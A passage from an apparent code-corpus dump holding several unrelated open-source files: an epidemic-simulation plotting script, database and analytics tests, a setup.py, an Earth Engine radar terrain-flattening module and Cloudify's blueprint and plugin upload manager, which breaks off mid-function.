report_times = scipy.linspace(0, tmax, tcount)
I = EoN.subsample(report_times, t, I)
ax.plot(report_times, I/N, color='grey', linewidth=5, alpha=0.3)
t, S, I = EoN.SIS_heterogeneous_meanfield_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N, '--')
t, S, I = EoN.SIS_compact_pairwise_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N)
t, S, I = EoN.SIS_homogeneous_pairwise_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N, '-.')
N=10000
gamma = 1
rho = 0.05
tmax = 10
tcount = 1001
kmin = 1
kmax = 40
Pk = {}
for k in range(kmin, kmax+1):
Pk[k] = k**(-2.)
norm_factor = sum(Pk.values())
for k in Pk:
Pk[k] /= norm_factor
deg_seq = get_deg_seq(N, Pk)
G = nx.configuration_model(deg_seq)
kave = sum(deg_seq)/N
tau = 1.5*gamma/kave
fig = plt.figure(1)
main = plt.axes()
sim_and_plot(G, tau, gamma, rho, tmax, tcount, main)
kmin = 10
kmax = 150
Pk = {}
for k in range(kmin, kmax+1):
Pk[k] = k**(-2.)
norm_factor = sum(Pk.values())
for k in Pk:
Pk[k] /= norm_factor
deg_seq = get_deg_seq(N, Pk)
G = nx.configuration_model(deg_seq)
kave = (sum(deg_seq)/N)
tau = 1.5*gamma/kave
fig = plt.figure(1)
ax1 = plt.gca()
inset = plt.axes([0.45,0.175,0.45,0.45])
sim_and_plot(G, tau, gamma, rho, tmax, tcount, inset)
ax1.set_xlabel('$t$')
ax1.set_ylabel('Prevalence')
plt.savefig('fig5p4.png') |
datmo/core/storage/local/tests/test_dal_environment.py | awesome-archive/datmo | 331 | 12684832 |
"""
Tests for LocalDAL
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import platform
from datetime import datetime
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
from datmo.core.storage.local.dal import LocalDAL
from datmo.core.entity.model import Model
from datmo.core.entity.environment import Environment
from datmo.core.util.exceptions import EntityNotFound, InvalidArgumentType
class TestLocalDAL():
def setup_method(self):
# provide mountable tmp directory for docker
tempfile.tempdir = "/tmp" if not platform.system(
) == "Windows" else None
test_datmo_dir = os.environ.get('TEST_DATMO_DIR',
tempfile.gettempdir())
self.temp_dir = tempfile.mkdtemp(dir=test_datmo_dir)
self.driver_type = "blitzdb"
self.driver_options = {
"driver_type": "file",
"connection_string": self.temp_dir
}
self.dal = LocalDAL(self.driver_type, self.driver_options)
model_name = "model_1"
model = self.dal.model.create(Model({"name": model_name}))
self.environment_input_dict = {
"model_id": model.id,
"driver_type": "docker",
"file_collection_id": "test_file_id",
"definition_filename": "Dockerfile",
"hardware_info": {
"system": "macosx"
},
"unique_hash": "slkdjfa23dk",
"language": "python3"
}
def teardown_method(self):
pass
# TODO: Add tests for other variables once figured out.
def test_create_environment_by_dictionary(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
assert environment.id
assert environment.driver_type == self.environment_input_dict[
'driver_type']
assert environment.file_collection_id == self.environment_input_dict[
'file_collection_id']
assert environment.definition_filename == self.environment_input_dict[
'definition_filename']
assert environment.hardware_info == self.environment_input_dict[
'hardware_info']
assert environment.unique_hash == self.environment_input_dict[
'unique_hash']
assert environment.created_at
assert environment.updated_at
environment_2 = self.dal.environment.create(
Environment(self.environment_input_dict))
assert environment_2.id != environment.id
test_environment_input_dict = self.environment_input_dict.copy()
test_environment_input_dict['id'] = "environment_id"
environment_3 = self.dal.environment.create(
Environment(test_environment_input_dict))
assert environment_3.id == test_environment_input_dict['id']
def test_get_by_id_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
result = self.dal.environment.get_by_id(environment.id)
assert environment.id == result.id
def test_get_by_shortened_id_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
result = self.dal.environment.get_by_shortened_id(environment.id[:10])
assert environment.id == result.id
def test_get_by_id_environment_new_driver_instance(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
# create new dal with new driver instance (success)
new_driver_instance = BlitzDBDALDriver("file", self.temp_dir)
new_dal_instance = LocalDAL(
self.driver_type, self.driver_options, driver=new_driver_instance)
new_environment_1 = new_dal_instance.environment.get_by_id(
environment.id)
assert new_environment_1.id == environment.id
# create new dal instance with same driver (success)
new_dal_instance = LocalDAL(self.driver_type, self.driver_options)
new_environment_2 = new_dal_instance.environment.get_by_id(
environment.id)
assert new_environment_2.id == environment.id
def test_update_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
# Update required and optional parameters
updated_environment_input_dict = self.environment_input_dict.copy()
updated_environment_input_dict['id'] = environment.id
updated_environment_input_dict['driver_type'] = "new_driver"
updated_environment_input_dict['created_at'] = datetime.utcnow()
updated_environment = self.dal.environment.update(
updated_environment_input_dict)
assert environment.id == updated_environment.id
assert environment.updated_at < updated_environment.updated_at
assert updated_environment.driver_type == updated_environment_input_dict[
'driver_type']
assert updated_environment.created_at == updated_environment_input_dict[
'created_at']
def test_delete_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
self.dal.environment.delete(environment.id)
deleted = False
try:
self.dal.environment.get_by_id(environment.id)
except EntityNotFound:
deleted = True
assert deleted
def test_query_environments_basic(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
assert len(self.dal.environment.query({"id": environment.id})) == 1
def test_query_environments_multiple(self):
environment_1 = self.dal.environment.create(
Environment(self.environment_input_dict))
environment_2 = self.dal.environment.create(
Environment(self.environment_input_dict))
environment_3 = self.dal.environment.create(
Environment(self.environment_input_dict))
results = self.dal.environment.query(
{}, sort_key="created_at", sort_order="ascending")
assert len(results) == 3
assert results[0].created_at == environment_1.created_at
assert results[1].created_at == environment_2.created_at
results = self.dal.environment.query(
{}, sort_key="created_at", sort_order="descending")
assert len(results) == 3
assert results[0].created_at == environment_3.created_at
assert results[1].created_at == environment_2.created_at
# Wrong order being passed in
failed = False
try:
_ = self.dal.environment.query(
{}, sort_key='created_at', sort_order='wrong_order')
except InvalidArgumentType:
failed = True
assert failed
# Wrong key and order being passed in
failed = False
try:
_ = self.dal.environment.query(
{}, sort_key='wrong_key', sort_order='wrong_order')
except InvalidArgumentType:
failed = True
assert failed
# wrong key and right order being passed in
expected_items = self.dal.environment.query(
{}, sort_key='created_at', sort_order='ascending')
items = self.dal.environment.query(
{}, sort_key='wrong_key', sort_order='ascending')
expected_ids = [item.id for item in expected_items]
ids = [item.id for item in items]
assert set(expected_ids) == set(ids)
def test_query_environments_range_query(self):
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
environments = self.dal.environment.query(
{}, sort_key="created_at", sort_order="descending")
result = self.dal.environment.query({
"created_at": {
"$lt":
environments[1]
.created_at.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
}
})
assert len(environments) == 3
assert len(result) == 1
|
setup.py | ajcr/rolling | 189 | 12684865 | from setuptools import setup, find_packages
from rolling import __version__
long_description = """**rolling** is a collection of computationally efficient
rolling window iterators for Python.
Many useful arithmetical, logical and statistical functions are implemented
to allow the window to be computed in sub-linear time (and in many instances
constant time). These include:
- Sum
- Min and Max
- All and Any
- Mean, Median and Mode
- Variance and Standard deviation
There's also a more general 'apply' mode where any specific function can be
applied to the window. Both fixed-length and variable-length windows are supported.
"""
setup(
name='rolling',
version=__version__,
description='Efficient rolling window algorithms',
long_description=long_description,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
keywords='rolling window iterator algorithms',
project_urls={
'Source': 'https://github.com/ajcr/rolling/',
'Tracker': 'https://github.com/ajcr/rolling/issues',
},
python_requires='>=3.6.0',
author='<NAME>',
license='MIT',
packages=find_packages(include=["rolling", "rolling.*"]),
tests_require=['pytest>=2.8.0'],
zip_safe=False,
)
|
ee/clickhouse/views/test/test_clickhouse_person.py | leirons/posthog | 7,409 | 12684875 |
from uuid import uuid4
from ee.clickhouse.client import sync_execute
from ee.clickhouse.models.event import create_event
from ee.clickhouse.util import ClickhouseTestMixin
from posthog.api.test.test_person import factory_test_person
from posthog.models import Event, Person
from posthog.models.person import PersonDistinctId
def _create_event(**kwargs):
kwargs.update({"event_uuid": uuid4()})
return Event(pk=create_event(**kwargs))
def _get_events(team_id):
return sync_execute("SELECT * FROM events WHERE team_id = %(team_id)s", {"team_id": team_id})
def _create_person(**kwargs):
return Person.objects.create(**kwargs)
class ClickhouseTestPersonApi(
ClickhouseTestMixin, factory_test_person(_create_event, _create_person, _get_events) # type: ignore
):
def test_split_person_clickhouse(self):
person = _create_person(
team=self.team, distinct_ids=["1", "2", "3"], properties={"$browser": "whatever", "$os": "Mac OS X"}
)
response = self.client.post("/api/person/%s/split/" % person.pk,).json()
self.assertTrue(response["success"])
people = Person.objects.all().order_by("id")
clickhouse_people = sync_execute(
"SELECT id FROM person FINAL WHERE team_id = %(team_id)s", {"team_id": self.team.pk}
)
self.assertCountEqual(clickhouse_people, [(person.uuid,) for person in people])
distinct_id_rows = PersonDistinctId.objects.all().order_by("person_id")
pdis = sync_execute(
"SELECT person_id, distinct_id FROM person_distinct_id FINAL WHERE team_id = %(team_id)s",
{"team_id": self.team.pk},
)
self.assertCountEqual(pdis, [(pdi.person.uuid, pdi.distinct_id) for pdi in distinct_id_rows])
pdis2 = sync_execute(
"SELECT person_id, distinct_id FROM person_distinct_id2 FINAL WHERE team_id = %(team_id)s",
{"team_id": self.team.pk},
)
self.assertCountEqual(pdis2, [(pdi.person.uuid, pdi.distinct_id) for pdi in distinct_id_rows])
|
modules/google-earth-engine/docker/sepal-ee/sepal/ee/radar/_terrain_flattening.py | BuddyVolly/sepal | 153 | 12684879 |
import math
import ee
from sepal.ee.image import replace
# Volumetric model (Hoekman & Reiche 2015)
def apply(image):
geometry = image.geometry()
srtm = ee.Image('USGS/SRTMGL1_003').clip(geometry)
# convert Sigma0 dB to Power
sigma0_pow = ee.Image.constant(10).pow(image.divide(10.0))
# Article ( numbers relate to chapters)
# 2.1.1 Radar geometry
theta_i = image.select('angle')
phi_i = ee.Terrain.aspect(theta_i).reduceRegion(
reducer=ee.Reducer.mean(),
geometry=geometry,
scale=100
).get('aspect')
# 2.1.2 Terrain geometry
alpha_s = ee.Terrain.slope(srtm).select('slope')
phi_s = ee.Terrain.aspect(srtm).select('aspect')
# 2.1.3 Model geometry
# reduce to 3 angle
phi_r = ee.Image.constant(phi_i).subtract(phi_s)
# convert all to radians
phi_rRad = phi_r.multiply(math.pi / 180)
alpha_sRad = alpha_s.multiply(math.pi / 180)
theta_iRad = theta_i.multiply(math.pi / 180)
ninetyRad = ee.Image.constant(90).multiply(math.pi / 180)
# slope steepness in range (eq. 2)
alpha_r = (alpha_sRad.tan().multiply(phi_rRad.cos())).atan()
# slope steepness in azimuth (eq 3)
alpha_az = (alpha_sRad.tan().multiply(phi_rRad.sin())).atan()
# local incidence angle (eq. 4)
theta_lia = (alpha_az.cos().multiply((theta_iRad.subtract(alpha_r)).cos())).acos()
theta_liaDeg = theta_lia.multiply(180 / math.pi)
# 2.2
# Gamma_nought_flat
gamma0 = sigma0_pow.divide(theta_iRad.cos())
gamma0dB = ee.Image.constant(10).multiply(gamma0.log10())
ratio_1 = gamma0dB.select('VV').subtract(gamma0dB.select('VH'))
# Volumetric Model
nominator = (ninetyRad.subtract(theta_iRad).add(alpha_r)).tan()
denominator = (ninetyRad.subtract(theta_iRad)).tan()
volModel = (nominator.divide(denominator)).abs()
# apply model
gamma0_Volume = gamma0.divide(volModel)
gamma0_VolumeDB = ee.Image.constant(10).multiply(gamma0_Volume.log10())
# we add a layover/shadow mask to the original implementation
# layover, where slope > radar viewing angle
alpha_rDeg = alpha_r.multiply(180 / math.pi)
layover = alpha_rDeg.lt(theta_i)
# shadow where LIA > 90
shadow = theta_liaDeg.lt(85)
# calculate the ratio for RGB vis
ratio = gamma0_VolumeDB.select('VV').subtract(gamma0_VolumeDB.select('VH'))
output = gamma0_VolumeDB.addBands(ratio).addBands(alpha_r).addBands(phi_s).addBands(theta_iRad) \
.addBands(layover).addBands(shadow).addBands(gamma0dB).addBands(ratio_1)
# rename bands for output
return replace(
image,
output.select(
['VV', 'VH', 'slope_1', 'slope_2'],
['VV', 'VH', 'layover', 'shadow']
).addBands(image.select('angle'))
)
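# Illustrative check (editorial addition, not part of the original module):
# equation (4) above computes the local incidence angle as
#   theta_lia = acos( cos(alpha_az) * cos(theta_i - alpha_r) )
# For an assumed 35 deg look angle, a 10 deg range-facing slope and no azimuth
# slope this can be verified with plain Python:
#   import math
#   theta_i, alpha_r, alpha_az = map(math.radians, (35.0, 10.0, 0.0))
#   print(math.degrees(math.acos(math.cos(alpha_az) * math.cos(theta_i - alpha_r))))
#   # -> 25.0, i.e. a slope facing the sensor reduces the local incidence angle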
|
rest-service/manager_rest/upload_manager.py | cloudify-cosmo/cloudify-manager | 124 | 12684943 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import json
import tarfile
import uuid
import wagon
import yaml
import shutil
import zipfile
import tempfile
import requests
import traceback
from setuptools import archive_util
from flask import request, current_app
from flask_restful.reqparse import Argument
from flask_restful.inputs import boolean
from cloudify.models_states import SnapshotState, BlueprintUploadState
from manager_rest.manager_exceptions import ArchiveTypeError
from manager_rest.constants import (FILE_SERVER_PLUGINS_FOLDER,
FILE_SERVER_SNAPSHOTS_FOLDER,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
FILE_SERVER_BLUEPRINTS_FOLDER)
from manager_rest.archiving import get_archive_type
from manager_rest.storage.models import Blueprint, Plugin
from manager_rest import config, chunked, manager_exceptions, workflow_executor
from manager_rest.utils import (mkdirs,
get_formatted_timestamp,
current_tenant,
unzip,
files_in_folder,
remove)
from manager_rest.resource_manager import get_resource_manager
from manager_rest.constants import (SUPPORTED_ARCHIVE_TYPES)
from manager_rest.rest.rest_utils import get_args_and_verify_arguments
_PRIVATE_RESOURCE = 'private_resource'
_VISIBILITY = 'visibility'
class UploadedDataManager(object):
def receive_uploaded_data(self, data_id=None, **kwargs):
file_server_root = config.instance.file_server_root
resource_target_path = tempfile.mktemp()
try:
additional_inputs = self._save_file_locally_and_extract_inputs(
resource_target_path,
self._get_data_url_key(),
self._get_kind())
doc, dest_file_name = self._prepare_and_process_doc(
data_id,
file_server_root,
resource_target_path,
additional_inputs=additional_inputs,
**kwargs)
if not os.path.isfile(resource_target_path):
# if the archive is a folder, we're copying its content,
# so there is no meaning to a specific archive file name...
dest_file_name = None
self._move_archive_to_uploaded_dir(doc.id,
file_server_root,
resource_target_path,
dest_file_name=dest_file_name)
return doc, 201
finally:
remove(resource_target_path)
@classmethod
def _extract_file_to_file_server(cls, archive_path, destination_root):
"""
Extracting a package.
:param destination_root: the root destination for the unzipped archive
:param archive_path: the archive path
:return: the full path for the extracted archive
"""
# extract application to file server
tempdir = tempfile.mkdtemp('-blueprint-submit')
try:
try:
archive_util.unpack_archive(archive_path, tempdir)
except archive_util.UnrecognizedFormat:
raise manager_exceptions.BadParametersError(
'Blueprint archive is of an unrecognized format. '
'Supported formats are: {0}'
.format(SUPPORTED_ARCHIVE_TYPES))
archive_file_list = os.listdir(tempdir)
if len(archive_file_list) != 1 or not os.path.isdir(
os.path.join(tempdir, archive_file_list[0])):
raise manager_exceptions.BadParametersError(
'archive must contain exactly 1 directory')
application_dir_base_name = archive_file_list[0]
# generating temporary unique name for app dir, to allow multiple
# uploads of apps with the same name (as it appears in the file
# system, not the app name field inside the blueprint.
# the latter is guaranteed to be unique).
generated_app_dir_name = '{0}-{1}'.format(
application_dir_base_name, uuid.uuid4())
temp_application_dir = os.path.join(tempdir,
application_dir_base_name)
temp_application_target_dir = os.path.join(tempdir,
generated_app_dir_name)
shutil.move(temp_application_dir, temp_application_target_dir)
shutil.move(temp_application_target_dir, destination_root)
return generated_app_dir_name
finally:
shutil.rmtree(tempdir)
@staticmethod
def _save_file_from_url(archive_target_path, url, data_type):
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or chunked.".format(data_type))
try:
with requests.get(url, stream=True, timeout=(5, None)) as resp:
resp.raise_for_status()
with open(archive_target_path, 'wb') as f:
for chunk in resp.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
except requests.exceptions.RequestException as e:
raise manager_exceptions.BadParametersError(
"Cannot fetch {0}: {1}".format(url, e))
@staticmethod
def _save_file_from_chunks(archive_target_path, data_type):
if request.data or 'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: request body, multi-form or "
"chunked.".format(data_type))
with open(archive_target_path, 'w') as f:
for buffered_chunked in chunked.decode(request.input_stream):
f.write(buffered_chunked)
@staticmethod
def _save_file_content(archive_target_path, data_type):
if 'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can't pass {0} both as URL via request body and multi-form"
.format(data_type))
uploaded_file_data = request.data
with open(archive_target_path, 'wb') as f:
f.write(uploaded_file_data)
def _save_files_multipart(self, archive_target_path):
inputs = {}
for file_key in request.files:
if file_key == 'inputs':
content = request.files[file_key]
# The file is a binary
if 'application' in content.content_type:
content_payload = self._save_bytes(content)
# Handling yaml
if content.content_type == 'application/octet-stream':
inputs = yaml.load(content_payload)
# Handling json
elif content.content_type == 'application/json':
inputs = json.load(content_payload)
# The file is raw json
elif 'text' in content.content_type:
inputs = json.load(content)
elif file_key == 'blueprint_archive':
self._save_bytes(request.files[file_key],
archive_target_path)
return inputs
@staticmethod
def _save_bytes(content, target_path=None):
"""
content should support read() function if target isn't supplied,
string rep is returned
:param content:
:param target_path:
:return:
"""
if not target_path:
return content.getvalue().decode("utf-8")
else:
with open(target_path, 'wb') as f:
f.write(content.read())
def _save_file_locally_and_extract_inputs(self,
archive_target_path,
url_key,
data_type='unknown'):
"""
Retrieves the file specified by the request to the local machine.
:param archive_target_path: the target of the archive
:param data_type: the kind of the data (e.g. 'blueprint')
:param url_key: if the data is passed as a url to an online resource,
the url_key specifies what header points to the requested url.
:return: None
"""
inputs = {}
# Handling importing blueprint through url
if url_key in request.args:
self._save_file_from_url(archive_target_path,
request.args[url_key],
data_type)
# handle receiving chunked blueprint
elif 'Transfer-Encoding' in request.headers:
self._save_file_from_chunks(archive_target_path, data_type)
# handler receiving entire content through data
elif request.data:
self._save_file_content(archive_target_path, data_type)
# handle inputs from form-data (for both the blueprint and inputs
# in body in form-data format)
if request.files:
inputs = self._save_files_multipart(archive_target_path)
return inputs
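    # Editorial note (grounded in the branches above): the archive itself can
    # arrive through exactly one of four mutually exclusive channels - a URL in
    # the url_key query parameter, a chunked Transfer-Encoding stream, the raw
    # request body, or a multipart 'blueprint_archive' part - while an optional
    # multipart 'inputs' part (binary YAML/JSON or raw JSON) is parsed into the
    # dict returned to the caller.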
def _move_archive_to_uploaded_dir(self,
data_id,
root_path,
archive_path,
dest_file_name=None):
if not os.path.exists(archive_path):
raise RuntimeError("Archive [{0}] doesn't exist - Cannot move "
"archive to uploaded {1}s "
"directory".format(archive_path,
self._get_kind()))
uploaded_dir = os.path.join(
root_path,
self._get_target_dir_path(),
data_id)
if not os.path.isdir(uploaded_dir):
os.makedirs(uploaded_dir)
current_app.logger.info('uploading archive to: {0}'
.format(uploaded_dir))
if os.path.isfile(archive_path):
if not dest_file_name:
try:
archive_type = self._get_archive_type(archive_path)
except ArchiveTypeError:
raise manager_exceptions.BadParametersError(
'Blueprint archive is of an unrecognized format. '
'Supported formats are: {0}'.format(
SUPPORTED_ARCHIVE_TYPES))
dest_file_name = '{0}.{1}'.format(data_id, archive_type)
shutil.move(archive_path,
os.path.join(uploaded_dir, dest_file_name))
else:
for item in os.listdir(archive_path):
shutil.copy(os.path.join(archive_path, item), uploaded_dir)
shutil.rmtree(archive_path)
@classmethod
def _zip_dir(cls, dir_to_zip, target_zip_path):
zipf = zipfile.ZipFile(target_zip_path, 'w', zipfile.ZIP_DEFLATED)
try:
plugin_dir_base_name = os.path.basename(dir_to_zip)
rootlen = len(dir_to_zip) - len(plugin_dir_base_name)
for base, dirs, files in os.walk(dir_to_zip):
for entry in files:
fn = os.path.join(base, entry)
zipf.write(fn, fn[rootlen:])
finally:
zipf.close()
def _get_kind(self):
raise NotImplementedError('Subclass responsibility')
def _get_data_url_key(self):
raise NotImplementedError('Subclass responsibility')
def _get_target_dir_path(self):
raise NotImplementedError('Subclass responsibility')
def _get_archive_type(self, archive_path):
raise NotImplementedError('Subclass responsibility')
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
additional_inputs,
**kwargs):
raise NotImplementedError('Subclass responsibility')
class UploadedSnapshotsManager(UploadedDataManager):
def _get_kind(self):
return 'snapshot'
def _get_data_url_key(self):
return 'snapshot_archive_url'
def _get_target_dir_path(self):
return FILE_SERVER_SNAPSHOTS_FOLDER
def _get_archive_type(self, archive_path):
return 'zip'
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
**kwargs):
return get_resource_manager().create_snapshot_model(
data_id,
status=SnapshotState.UPLOADED
), None
class UploadedBlueprintsManager(UploadedDataManager):
def receive_uploaded_data(self, data_id=None, **kwargs):
blueprint_url = None
visibility = kwargs.get(_VISIBILITY, None)
labels = kwargs.get('labels', None)
override_failed_blueprint = kwargs.get('override_failed', False)
args = get_args_and_verify_arguments([
Argument('private_resource', type=boolean),
Argument('application_file_name', default='')
])
# Handle importing blueprint through url
if self._get_data_url_key() in request.args:
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or "
"chunked.".format(self._get_kind()))
blueprint_url = request.args[self._get_data_url_key()]
visibility = get_resource_manager().get_resource_visibility(
Blueprint, data_id, visibility, args.private_resource)
new_blueprint = self._prepare_and_process_doc(
data_id,
visibility,
blueprint_url,
application_file_name=args.application_file_name,
override_failed_blueprint=override_failed_blueprint,
labels=labels)
return new_blueprint, 201
def _prepare_and_process_doc(self, data_id, visibility, blueprint_url,
application_file_name,
override_failed_blueprint,
labels=None):
# Put a new blueprint entry in DB
now = get_formatted_timestamp()
rm = get_resource_manager()
if override_failed_blueprint:
new_blueprint = rm.sm.get(Blueprint, data_id)
new_blueprint.plan = None
new_blueprint.description = None
new_blueprint.created_at = now
new_blueprint.updated_at = now
new_blueprint.main_file_name = None
new_blueprint.visibility = visibility
new_blueprint.state = BlueprintUploadState.PENDING
rm.sm.update(new_blueprint)
else:
new_blueprint = rm.sm.put(Blueprint(
plan=None,
id=data_id,
description=None,
created_at=now,
updated_at=now,
main_file_name=None,
visibility=visibility,
state=BlueprintUploadState.PENDING
))
if not blueprint_url:
new_blueprint.state = BlueprintUploadState.UPLOADING
rm.sm.update(new_blueprint)
self.upload_archive_to_file_server(data_id)
try:
new_blueprint.upload_execution, messages = rm.upload_blueprint(
data_id,
application_file_name,
blueprint_url,
config.instance.file_server_root, # for the import resolver
labels=labels
)
rm.sm.update(new_blueprint)
workflow_executor.execute_workflow(messages)
except manager_exceptions.ExistingRunningExecutionError as e:
new_blueprint.state = BlueprintUploadState.FAILED_UPLOADING
new_blueprint.error = str(e)
new_blueprint.error_traceback = traceback.format_exc()
rm.sm.update(new_blueprint)
self.cleanup_blueprint_archive_from_file_server(
data_id, current_tenant.name)
raise
return new_blueprint
def upload_archive_to_file_server(self, blueprint_id):
file_server_root = config.instance.file_server_root
archive_target_path = tempfile.mktemp()
try:
self._save_file_locally_and_extract_inputs(
archive_target_path,
None,
self._get_kind())
self._move_archive_to_uploaded_dir(
blueprint_id,
file_server_root,
archive_target_path)
except Exception as e:
sm = get_resource_manager().sm
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = BlueprintUploadState.FAILED_UPLOADING
blueprint.error = str(e)
sm.update(blueprint)
self.cleanup_blueprint_archive_from_file_server(
blueprint_id, blueprint.tenant.name)
raise
finally:
remove(archive_target_path)
def extract_blueprint_archive_to_file_server(self, blueprint_id, tenant):
sm = get_resource_manager().sm
file_server_root = config.instance.file_server_root
local_path = os.path.join(
config.instance.file_server_root,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
tenant,
blueprint_id)
for arc_type in SUPPORTED_ARCHIVE_TYPES:
# attempting to find the archive file on the file system
local_file_path = os.path.join(
local_path,
'{0}.{1}'.format(blueprint_id, arc_type)
)
if os.path.isfile(local_file_path):
break
else:
error_msg = "Could not find blueprint's archive; " \
"Blueprint ID: {0}".format(blueprint_id)
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = \
BlueprintUploadState.FAILED_EXTRACTING_TO_FILE_SERVER
blueprint.error = error_msg
sm.update(blueprint)
raise manager_exceptions.NotFoundError(error_msg)
try:
app_dir = self._extract_file_to_file_server(local_file_path,
file_server_root)
except Exception as e:
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = \
BlueprintUploadState.FAILED_EXTRACTING_TO_FILE_SERVER
blueprint.error = str(e)
sm.update(blueprint)
remove(local_path)
raise e
tenant_dir = os.path.join(
file_server_root,
FILE_SERVER_BLUEPRINTS_FOLDER,
tenant)
mkdirs(tenant_dir)
bp_from = os.path.join(file_server_root, app_dir)
bp_dir = os.path.join(tenant_dir, blueprint_id)
try:
# use os.rename - bp_from is already in file_server_root, ie.
# same filesystem as the target dir
os.rename(bp_from, bp_dir)
except OSError as e: # eg. directory not empty
shutil.rmtree(bp_from)
raise manager_exceptions.ConflictError(str(e))
self._process_plugins(file_server_root, blueprint_id)
@staticmethod
def cleanup_blueprint_archive_from_file_server(blueprint_id, tenant):
remove(os.path.join(config.instance.file_server_root,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
tenant,
blueprint_id))
def _get_kind(self):
return 'blueprint'
def _get_data_url_key(self):
return 'blueprint_archive_url'
def _get_target_dir_path(self):
return os.path.join(
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER, current_tenant.name)
def _get_archive_type(self, archive_path):
return get_archive_type(archive_path)
@classmethod
def _process_plugins(cls, file_server_root, blueprint_id):
plugins_directory = os.path.join(
file_server_root,
FILE_SERVER_BLUEPRINTS_FOLDER,
current_tenant.name,
blueprint_id,
"plugins")
if not os.path.isdir(plugins_directory):
return
plugins = [os.path.join(plugins_directory, directory)
for directory in os.listdir(plugins_directory)
if os.path.isdir(os.path.join(plugins_directory,
directory))]
for plugin_dir in plugins:
final_zip_name = '{0}.zip'.format(os.path.basename(plugin_dir))
target_zip_path = os.path.join(plugins_directory, final_zip_name)
cls._zip_dir(plugin_dir, target_zip_path)
class UploadedBlueprintsValidator(UploadedBlueprintsManager):
def receive_uploaded_data(self, data_id=None, **kwargs):
blueprint_url = None
# avoid clashing with existing blueprint names
blueprint_id = data_id + uuid.uuid4().hex[:16]
args = get_args_and_verify_arguments([
Argument('application_file_name', default='')
])
# Handle importing blueprint through url
if self._get_data_url_key() in request.args:
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or "
"chunked.".format(self._get_kind()))
blueprint_url = request.args[self._get_data_url_key()]
self._prepare_and_process_doc(
blueprint_id,
blueprint_url,
application_file_name=args.application_file_name)
return "", 204
def _prepare_and_process_doc(self, data_id, blueprint_url,
application_file_name):
# Put a temporary blueprint entry in DB
rm = get_resource_manager()
now = get_formatted_timestamp()
temp_blueprint = rm.sm.put(Blueprint(
plan=None,
id=data_id,
description=None,
created_at=now,
updated_at=now,
main_file_name=None,
visibility=None,
state=BlueprintUploadState.VALIDATING
))
if not blueprint_url:
self.upload_archive_to_file_server(data_id)
try:
temp_blueprint.upload_execution, messages = rm.upload_blueprint(
data_id,
application_file_name,
blueprint_url,
config.instance.file_server_root, # for the import resolver
validate_only=True,
)
workflow_executor.execute_workflow(messages)
except manager_exceptions.ExistingRunningExecutionError:
rm.sm.delete(temp_blueprint)
self.cleanup_blueprint_archive_from_file_server(
data_id, current_tenant.name)
raise
class UploadedPluginsManager(UploadedDataManager):
def _get_kind(self):
return 'plugin'
def _get_data_url_key(self):
return 'plugin_archive_url'
def _get_target_dir_path(self):
return FILE_SERVER_PLUGINS_FOLDER
def _get_archive_type(self, archive_path):
return 'tar.gz'
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
**kwargs):
# support previous implementation
wagon_target_path = archive_target_path
# handle the archive_target_path, which may be zip or wagon
if not self._is_wagon_file(archive_target_path):
if not zipfile.is_zipfile(archive_target_path):
raise manager_exceptions.InvalidPluginError(
'input can be only a wagon or a zip file.')
archive_name = unzip(archive_target_path,
logger=current_app.logger)
os.remove(archive_target_path)
shutil.move(archive_name, archive_target_path)
try:
wagon_target_path, _ = \
self._verify_archive(archive_target_path)
except RuntimeError as re:
